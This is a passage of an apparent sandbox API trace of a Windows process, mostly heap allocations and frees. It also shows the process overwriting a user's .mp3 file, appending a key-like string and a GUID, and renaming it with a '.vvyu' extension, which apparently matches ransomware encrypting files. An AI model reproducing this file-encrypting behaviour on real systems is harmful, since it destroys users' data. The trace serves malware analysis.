(HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a348 [0196.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0196.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a3a8 [0196.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a348 | out: hHeap=0x6a0000) returned 1 [0196.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a348 [0196.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a360 | out: hHeap=0x6a0000) returned 1 [0196.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0196.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0196.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0196.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0196.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0196.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a318 | out: hHeap=0x6a0000) returned 1 [0196.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a318 [0196.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0196.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0196.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a378 | out: hHeap=0x6a0000) returned 1 [0196.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0196.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3a8 | out: hHeap=0x6a0000) returned 1 [0196.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0196.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0d0a0 [0196.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0196.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0196.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a318 | out: hHeap=0x6a0000) returned 1 [0196.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0196.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0196.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0196.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0196.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0196.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0196.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0196.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0196.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0196.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0196.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0196.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0d0a0 | out: hHeap=0x6a0000) returned 1 [0196.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0196.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a348 | out: hHeap=0x6a0000) returned 1 [0196.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0196.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a390 | out: hHeap=0x6a0000) returned 1 [0196.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0196.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a330 | out: hHeap=0x6a0000) returned 1 [0196.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a300 | out: hHeap=0x6a0000) returned 1 [0196.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0196.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0196.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0196.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2e8 | out: hHeap=0x6a0000) returned 1 [0196.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d040 | out: hHeap=0x6a0000) returned 1 [0196.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0196.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0196.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0196.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0196.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0196.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0196.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0196.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0196.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0196.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0196.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0196.926] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4d778*, nNumberOfBytesToWrite=0xa931, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4d778*, lpNumberOfBytesWritten=0x30ffb14*=0xa931, lpOverlapped=0x0) returned 1 [0196.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4d778 | out: hHeap=0x6a0000) returned 1 [0196.927] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xa936, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.927] WriteFile (in: hFile=0x52c, lpBuffer=0x2c31700*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c31700*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0196.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0196.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0196.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0196.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0196.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0196.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0196.928] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0196.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.928] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.929] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0196.929] CloseHandle (hObject=0x52c) returned 1 [0196.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b3e8 [0196.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8c0) returned 0x2d3a670 [0196.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0196.931] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\0cC9EkHwaIG\\5VO8Yp9P.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\0cc9ekhwaig\\5vo8yp9p.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\0cC9EkHwaIG\\5VO8Yp9P.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\0cc9ekhwaig\\5vo8yp9p.mp3.vvyu")) returned 1 [0196.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0196.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.933] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.936] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd6c80, ftCreationTime.dwHighDateTime=0x1d89a30, ftLastAccessTime.dwLowDateTime=0x7cbcbd00, ftLastAccessTime.dwHighDateTime=0x1d89c6a, ftLastWriteTime.dwLowDateTime=0x7cbcbd00, ftLastWriteTime.dwHighDateTime=0x1d89c6a, nFileSizeHigh=0x0, nFileSizeLow=0xa936, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5VO8Yp9P.mp3", cAlternateFileName="")) returned 0 [0196.936] FindClose (in: hFindFile=0x2cbfa90 | out: hFindFile=0x2cbfa90) returned 1 [0196.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0196.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ed50 | out: hHeap=0x6a0000) returned 1 [0196.937] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0196.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee380 [0196.937] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0196.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2dc80 [0196.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.958] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.958] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.958] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.958] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.958] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.960] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.960] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2dc80 [0196.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.965] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.965] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 